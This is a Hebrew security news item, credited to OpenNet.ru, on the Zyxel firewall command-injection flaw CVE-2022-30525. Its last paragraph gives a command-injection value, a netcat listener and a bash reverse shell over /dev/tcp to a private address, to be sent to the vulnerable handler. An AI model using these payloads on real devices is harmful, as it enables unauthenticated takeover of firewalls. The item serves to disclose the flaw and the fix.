פגיעות בחומות אש של Zyxel המאפשרת ביצוע קוד ללא אימות

זוהתה פגיעות קריטית (CVE-2022-30525) במכשירי Zyxel מסדרת ATP, VPN ו-USG FLEX, שנועדה לארגן את פעולת חומות האש, IDS ו-VPN בארגונים, מה שמאפשר לתוקף חיצוני לבצע קוד על מכשיר ללא זכויות משתמש ללא אימות. כדי לבצע תקיפה, תוקף חייב להיות מסוגל לשלוח בקשות למכשיר באמצעות פרוטוקול HTTP/HTTPS. Zyxel תיקנה את הפגיעות בעדכון הקושחה של ZLD 5.30. לפי שירות Shodan, ישנם כיום 16213 מכשירים שעלולים להיות פגיעים ברשת הגלובלית שמקבלים בקשות באמצעות HTTP/HTTPS.

הפעולה מתבצעת על ידי שליחת פקודות שתוכננו במיוחד למטפל האינטרנט /ztp/cgi-bin/handler, נגישות ללא אימות. הבעיה נגרמת מהיעדר ניקוי נכון של פרמטרי בקשה בעת ביצוע פקודות במערכת באמצעות הקריאה os.system המשמשת בספריית lib_wan_settings.py ומבוצעת בעת עיבוד פעולת setWanPortSt.

לדוגמה, תוקף יכול להעביר את המחרוזת "; ping 192.168.1.210;" מה שיוביל לביצוע הפקודה "ping 192.168.1.210" במערכת. כדי לקבל גישה למעטפת הפקודה, אתה יכול להפעיל את "nc -lvnp 1270" במערכת שלך, ולאחר מכן ליזום חיבור הפוך על ידי שליחת בקשה למכשיר עם ה-'; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

מקור: OpenNet.ru